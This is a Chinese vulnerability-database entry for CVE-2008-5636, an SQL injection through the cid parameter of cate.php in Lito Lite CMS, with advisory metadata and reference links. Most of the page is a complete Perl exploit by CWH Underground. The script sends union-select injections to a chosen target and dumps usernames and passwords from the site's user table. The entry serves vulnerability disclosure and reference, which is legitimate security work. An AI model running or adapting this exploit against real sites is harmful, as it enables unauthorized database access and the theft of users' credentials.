Lito Lite 'cate.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116857 漏洞类型 SQL注入
发布时间 2008-11-29 更新时间 2008-12-19
CVE编号 CVE-2008-5636 CNNVD-ID CNNVD-200812-328
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7294
https://www.securityfocus.com/bid/32538
https://cxsecurity.com/issue/WLB-2008120168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-328
|漏洞详情
LitoLiteCMS是一款小巧的内容管理系统软件。LitoLiteCMS的cate.php中存在SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助cid参数,执行任意SQL指令。
|漏洞EXP
#!/usr/bin/perl -w
#===========================================================
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#===========================================================
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : Lito Lite CMS
#DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################


use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
   print "\n==============================================\n";
   print "    Lito Lite Remote SQL Injection Exploit   \n";
   print "                                              \n";
   print "        Discovered By CWH Underground         \n";
   print "==============================================\n";
   print "                                              \n";
   print "  ,--^----------,--------,-----,-------^--,   \n";
   print "  | |||||||||   `--------'     |          O	\n";
   print "  `+---------------------------^----------|   \n";
   print "    `\_,-------, _________________________|   \n";
   print "      / XXXXXX /`|     /                      \n";
   print "     / XXXXXX /  `\   /                       \n";
   print "    / XXXXXX /\______(                        \n";
   print "   / XXXXXX /                                 \n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
   print " (________(                                   \n";
   print "  `------'                                    \n";
   print "                                              \n"; 
   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
   print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
   exit();
}

$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else { 
	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
	exit;
}
}

# milw0rm.com [2008-11-29]
|受影响的产品
Lito Lite Lito Lite 0
|参考资料

来源:XF
名称:litolite-cate-sql-injection(46923)
链接:http://xforce.iss.net/xforce/xfdb/46923
来源:BID
名称:32538
链接:http://www.securityfocus.com/bid/32538
来源:MILW0RM
名称:7294
链接:http://www.milw0rm.com/exploits/7294
来源:VUPEN
名称:ADV-2008-3300
链接:http://www.frsirt.com/english/advisories/2008/3300
来源:SREASON
名称:4779
链接:http://securityreason.com/securityalert/4779
来源:SECUNIA
名称:32910
链接:http://secunia.com/advisories/32910